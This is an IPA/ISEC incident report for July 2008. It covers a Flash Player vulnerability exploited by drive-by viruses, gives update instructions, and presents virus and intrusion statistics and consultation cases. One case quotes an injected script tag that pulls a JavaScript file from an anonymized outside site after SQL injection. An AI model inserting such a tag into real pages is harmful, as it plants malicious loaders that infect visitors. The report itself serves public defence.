Font Size Change

HOMEIT SecurityIPA/ISEC in JAPAN:virus and UCA incident report for July2008

PRINT PAGE

IT Security

IPA/ISEC in JAPAN:virus and UCA incident report for July2008

August 12, 2008

IT Security Center
Information-technology Promotion Agency, Japan (IPA)

This is a summary of computer virus/unauthorized computer access incident reports for July, 2008 compiled by IPA.

I. Reminder for the Month:

- Be Sure to Conduct Anti-Vulnerability Measures (*1) Thoroughly -

Never forget to update Plug-ins such as Flash Player, etc

Of the viruses parsed by IPA in July, there developed some that exploit vulnerability in Flash Player.  Flash Player is the typical program providing additional feature(s) to application software such as web browser, etc. so called “Plug-in” and is embedded (*2) to most of all web browsers.

Accordingly, with the Flash Player for which vulnerability has not yet been solved, your computer will be infected by virus easily when browsed the website(s) that has Flash contents (virus) which exploit vulnerability.  In addition, the damage relevant to this virus will be promulgated extensively when such website is increased in number.

As with the Plug-ins such as Flash Player, etc. it is necessary to conduct anti-vulnerability measures along with the other programs.  Be sure to resolve the vulnerability that your computer may have by updating the Plug-ins for the web browsers now you are using.

*1 Vulnerability: generally refers the weakness on security.  It is also called Security Hole.

*2 Source: Statistics by Adobe Systems Inc.

http://www.adobe.com/products/player_census/flashplayer/

(1) Overview of Plug-in

Chart1-1 Overview of Plug-inPlug-in is the program which provides additional feature to the application software such as web browsers (See the Chart 1-1).

For instance, if you use the plug-in of Adobe Reader on the web browser, you can browse PDF (Portable Document Format); for the plug-in of QuickTime, you can replay movie file, etc.  Equally, you can replay Flash contents if you use the plug-in of Flash Player.

As previously mentioned, you can extend functionality of application software using one of these plug-in features.


(2) Problem in Flash Player

When increased such website in where Flash contents (virus) that exploit vulnerability is embedded in Flash Player in number, it is probable that the damage caused by that virus will widely be spread.  To prevent such damage, it is necessary to use updated, vulnerability free Flash Player.  However, unlike the other Plug-ins, there resides following problems in the Flash Player and they are tending to be used as they are.

(a) Since Flash Player is already embedded in the most of web browsers when procured a computer, user uses it without aware that the Flash Player is natively installed.
(b) Since the automatically updating mechanism is insufficient(*); the actual updating procedure is somewhat complexity.
(c) They need to be updated respectively, but it tends to be slipped over.

(*) The frequency for automatically updating mechanism is originally configured at 30 days of intervals.  This configuration can be changed at the “Flash Player Configuration Manager”.  For further details, please refer to the following site.

Flash Player help – Configuration Manager(in Japanese)

http://www.macromedia.com/support/documentation/jp/
flashplayer/help/settings_manager.html

It is necessary that the users always aware to use updated Flash Player as above mentioned problems has not yet been solved in Flash Player.

(3) The Virus which Exploits Vulnerability in Flash Player

Chart1-2 Behavior of Virus which Exploits Vulnerability in Flash PlayerHerein, we will discuss about the Flash contents (virus) parsed by IPA. The virus exploits vulnerability in Flash Player. This vulnerability allows to conduct arbitrary codes(*3) upon opening malicious Flash contents. Browsing with the Flash Player for Windows that has vulnerability, your computer will be easily infected by the virus when you simply browse the website in where Flash contents is embedded (See 1) and 2) in the Chart 1-2).

When the virus is infected, the Flash Player functions as a downloader tool or download supporting tool, in another word, (See 3) and 4) in the Chart 1-2) to download different virus from specific sites (See 5) in the Chart 1-2).

The virus downloaded is saved as “orz.exe” and is executed simultaneously (See 6) in the Chart 1-2).Such computer in where virus is downloaded may have certain damage such as private information theft, pc hi-jacking, etc.

Anti-virus software is not almighty as it may not detect virus even it is updated.  To that end, it is mandate to resolve vulnerability residing in your computer.  Be sure to check your Flash Player by referring the procedures 4) and 5).

*3 JVNDB-2008-001284(in Japanese):

http://jvndb.jvn.jp/contents/ja/2008/JVNDB-2008-001284.html

(4) Checking Procedure of Flash Player

To check with or without that the Flash Player is installed in your computer, please click the “Adobe Flash Player version check test” in the “Adobe Flash Player Support Center (http://www.adobe.com/jp/support/flashplayer/)(in Japanese).  The Chart 1-3 shows the instance when used Internet Explorer (hereinafter refers as IE).  You can use any type of web browser to check with or without of Flash Player in your web browser.  In addition, be sure to check all the browsers you are using.

Chart1-3 One Instance of the Version Test for Flash Player(In the case of IE)

Chart1-4&5What if Flash Player is not installed in your web browser, the part enclosed by a break line in the Chart 1-3 is appeared to be as the Chart 1-4.  In this case, none of updating procedure will be required.  However, if the version information en80closed by a break line is appeared to be as the Chart 1-5, Flash Player is installed in your web browser.  To check whether your Flash Player is latest or not, be sure to check the part enclosed in a break line in the Chart 1-3 with the versions listed at the bottom of the display screen (See the Chart 1-6). 

To view the version list, you need to way down the screen in the Chart 1-3.  If your version number is the latest (i.e., the version number is matched with the one of the versions listed in the Chart 1-6), then the procedure is over and you do not need to do another work.  If not (i.e., your version number is smaller than the one listed in the versions list in the Chart 1-6), be sure to go for “(5) Updating Procedure for Flash Player” to update.

Chart1-6 Chart 1-6: 天ersion List for Flash Player�

(5) Updating Procedure for Flash Player

First of all, uninstall the Flash Player being installed.  The procedure for uninstallation is as follows.

<How to uninstall>

(i) Download the “Adobe Flash Player uninstaller” from the following URL.

http://support.adobe.co.jp/faq/faq/qadoc.sv?230810+002(in Japanese)

(ii) Execute the uninstaller after all applications are successfully closed.
(iii) Reboot your computer.

Subsequently, the latest version of Flash Player should be installed from the following exclusive site:  The procedure is subtly differed if IE is used for the Web browser from the others (i.e., Firefox, Opera, Safari, etc.).  We will separately describe both procedures, accordingly.

<How to install>

In the case of IE

(i)

Chart1-7Installation activity will not be available if the security level in the Internet Zone of IE is configured as “High”.  As shown in the Chart 1-7, you need to add the website(s) required to install Flash Player as the “Trusted Site” as the initial step.  1) Click the “site” button while designating the security tab in the Internet Option screen (“Start” → “Control Panel” → “Internet Option”): 2) When the “site” window is displayed, be sure to append following URLs.
  http://*.adobe.com
  http://*.macromedia.com

(ii)

Secondary, click the “immediate installation” button by opening the exclusive site for installation with IE (http://www.adobe.com/go/JP-H-GET-FLASH) (in Japanese).

In this bout, the check box for the “Free Google Tool Bar” is getting effective as the option to be installed along with the URLs above listed: you can disable the “Google Tool Bar” if it is not necessary.


In this bout, the check box for the “Free Google Tool Bar” is getting effective as the option to be installed along with the URLs above listed: you can disable the “Google Tool Bar” if it is not necessary.

Other than IE

(i)

Click the “immediate installation” button by opening the exclusive site for installation with the Web browser (http://www.adobe.com/go/JP-H-GET-FLASH) (in Japanese) you are using.

(ii) Click the “save file” button and download the file when the dialog box “Opening of install_flash_player.exe” is displayed.
(iii) Close the web browser and execute the “install_flash_player.exe” downloaded.

In either case, you need to conduct “(4) Checking Procedure for Flash Player” after thoroughly installed Flash Player to check whether they are successfully updated.

<Reference>

II. Reporting Status for Computer Virus – further details, please refer to the Attachment 1 –

The detection number of virus (*1) in July was about 191T: decreased from 236T (19.1%) in June.  In addition, the reported number of Virus (*2) for July was about 1,448: decreased from 2,002 (27.7%) in June.

*1 Detection Number: Reported virus counts (cumulative) found by a filer.

*2 Reported Number: Virus counts are aggregated: viruses of same type and variants reported on the same day are counted as one case number regardless how many viruses or the actual number of viruses is found by the same filer on the same day.  In July, the reported number was 1,448: aggregated virus detection number was about 191T (From the May ‘08 report, we will use “T (thousand)” instead of using “M (Million)” to present the detection number of virus).

The worst detection number of virus was for W32/Netsky with about 180T, and W32/Mytob with about 3T and W32/Mydoom with about 2T were subsequently followed.

Chart 2-1

Chart 2-2

III. Reporting Status of Unauthorized Computer Access (includes Consultations) Please refer to the Attachment 2 for further details

Report for unauthorized computer access and status of consultation
  Feb. Mar. Apr. May Jun. Jul.
Total for Reported (a) 4 19 14 4 13 19
  Damaged (b) 4 13 10 4 11 18
Not Damaged (c) 0 6 4 0 2 1
Total for Consultation (d) 29 35 56 37 36 49
  Damaged (e) 10 15 31 18 15 26
Not Damaged (f) 19 20 25 19 21 23
Grand Total (a + d) 33 54 70 41 49 68
  Damaged (b + e) 14 28 41 22 26 44
Not Damaged (c + f) 19 26 29 19 23 24

(1) Reporting Status for Unauthorized Computer Access

Reported number of June was 19: Of the number actually damaged was 18.

(2) Accepting Status for Consultation relevant to Unauthorized Access

The total number of consultation relevant to unauthorized computer access was 49 (of 6 were counted as reported number as well): Of 26 was the number actually damaged.

(3) Status of Damage

The breakdown of the damage included intrusion with 6, DoS attack with 2, source address spoofing with 2 and the others (damaged) with 8.

The damages caused by intrusion were: certain Web page contents were altered in the event of SQL* injection* attack conducted with 2, server was exploited as the steppingstone server to attack to the other site with 3, Web page contents were altered intruded via ftp server with 1.  The major causes of intrusion were via vulnerability with 2, easily assumable password setting with 2, insufficient configuration on the server for a network with 1 and exploitation of ftp account information with 1.

As for others (damaged), someone spoofed to be the legitimate user logged-in and acquired the services available only for the identical user signed up with: the services include net auction with 3, on-line game with 2, etc.

*SQL (Structured Query Language): A query language for data operation/definition in the relational database management system (RDBMS).

*SQL injection: One of attacking methods to browse and alter the data with a database fraudulently by exploiting failure or vulnerability in the program accessing to the database.

(4) Damage Instance:

[Intrusion]

(i) Database was altered caused by an SQL injection attack…
<Instance>
  • – Virus was detected by anti-virus software when the site manager in this business accessed to the data stored in a database for maintenance activity.
  • – The table of the database was studied.  Then, it was realized that the following scripts were embedded (<script src=http://www.(xxx).com/ngg.js></script>) and the database was altered accordingly.  This is the script to have users refer the JavaScript file from one of suspicious sites and should not have been there originally.
  • – The cause was that vulnerability was exploited/attacked within SQL injection.
(ii) Someone spoofing to be myself (legitimate user) and discard the items for on-line games without asking…
<Instance>
  • – Suddenly, I cannot logged-in to the on-line game sites with my ID.
  • – According to the site manager, it was realized that someone logged-in and discarded the items and coins possessed by my avatar in the games.
  • – Since I automatically saved my ID and password upon logged-in to the games, it may be read by fraudulent way.

IV. Accepting Status of Consultation

The gross number of the consultation in June was 1,387.  Of the consultation relevant to One-click Billing Fraud” with 457 (May: 372), increased drastically and be the worst result since IPA started to aggregate the numbers. As for others, consultation relevant to “Hard selling of phony security measures software” with 14 (June: 14) and the consultation relevant to “ Winny ” with 4 (June: 4), etc. were also realized.

Chart 4-1: All the Consultation Number Accepted by IPA over the Past 6 Months
  Feb. Mar. Apr. May Jun. Jul.
Total 350 654 938 1080 1211 1387
  Automatic Response System 192 373 514 649 693 817
Telephone 110 214 335 379 456 500
e-mail 47 66 87 48 60 70
Fax, Others 1 1 2 4 2 0

*IPA consults/advises for computer viruses/unauthorized computer accesses as well as the other information concerning overall security issues

Mail: Please feel free to call at +81-3-5978-7517. for virus issues, Please feel free to call at +81-3-5978-7517.for crack issues.
Tel.: +81-3-5978-7509 (24-hour automatic response)
Fax: +81-3-5978-7518 (24-hour automatic response)

*”Automatic Response System”:    Responding numbers by automatic response
*“Telephone”:      Responding numbers by the Security Center personnel
*The Total case number includes the number in Consultation (d) column of the Chart in the “III. Reported Status for Unauthorized Computer Access” and “IV. Accepting Status of Consultation”.

Chart 4-1: One-click Billing Fraud: Number of Consultatio

The major consultation instances are as follows.

(i) Virus is detected upon accessed to the site in where I am used to visit…?

Consultation:

Virus was detected by anti-virus software when I accessed to one of renowned site in where I visit daily.  I’d visited there yesterday as well, but none of virus was detected in that day.  What was happened?

Response:

It seemed that the site was having been altered by an adversaryThere embedded some traps (scripts) that lead to download some virus when user simply accesses to that site.  Since this type of trap is designed only attack to the vulnerability in OSs and applications, virus will not be downloaded if the vulnerability in the consultor’s computer is resolved.  Accordingly, be sure to update your OSs and applications regularly either by utilizing Microsoft Update or by updating applications being used.

<Reference>

(ii)The site managed and operated by individually established server was attacked…?

Consultation:

The server was getting disabled suddenly as the number of requests was rushed to the web server concurrently.  The IP addresses seeming to be the sources were varied.  A few hours later, the server gets back to normal operation.

Response:

Upon visited the URL the consultor thought that his/her site was attacked, it was realized that his/her article in that site was previously introduced in the renowned news site.  Those people who saw the news site rushed to access to the consultor’s site as well, it was tentatively, but appeared as if the site was conducted by DoS attack, accordingly.

(Upon access logs for the Web server was checked, it was realized that the “Referrer Information”, the source information, used for the article in the consultor’s site was from the legitimate (news site) URL.)

V. Accessing Status Captured by the Internet Monitoring (TALOT2”) in July

According to the Internet Monitoring (TALOT2), the total of unwanted (one-sided) number of access in July 2008 was 148,028 for the 10 monitoring points and the gross number for the source* was 63,407. That is, the number of access was 478 from 205 source addresses/monitoring point/day.

*Gross number of source:

the gross number of the source accessed to TALOT2.  In addition, the source will be counted as 1 if accessed from identical source in the same day to the same point/port

Since each monitoring environment for the TALOT2 is nearly equal to the general connection environment used for the Internet; it can be considered that the same amount of unwanted (one-sided) access can be monitored for the general Internet users’ connection environment.  In another word, your computer is being accessed from 205 unknown source addresses in average/day or you are being accessed about 2 times from one source address which considered unauthorized.

Chart 5-1: Unwanted (One-sided) Number of Access and Source Number of Access/Monitoring Point/Day in Average

The Chart 5-1 shows the number of access and the source number of access/monitoring point/day from February to July 2008 in Average.  According to this chart, both unwanted (one-sided) accesses were decreased compared with the numbers in June and were continually decreasing over the past 6 months.

The major cause relevant to this decrease was that accesses to the port 445/tcp which seemed to be the fraudulent access targeting vulnerability mainly in the file/printer sharing in Windows and to the port 1028/udp which sends pop-up message (spam) exploiting Windows Messenger Service were decreased.  As for the number of access to the other ports were not significantly changed.

 

For further information for the above mentioned information, please refer to the following URLs as well.

Variety of statistical Information provided by the other organizations/vendors is available in the following sites.

Contact

IT Security Center, Information-technology Promotion Agency, Japan (IPA/ISEC)
Tel:+81-3-5978-7527
Fax:+81-3-5978-7518
E-mail: Please feel free to call at +81-3-5978-7517.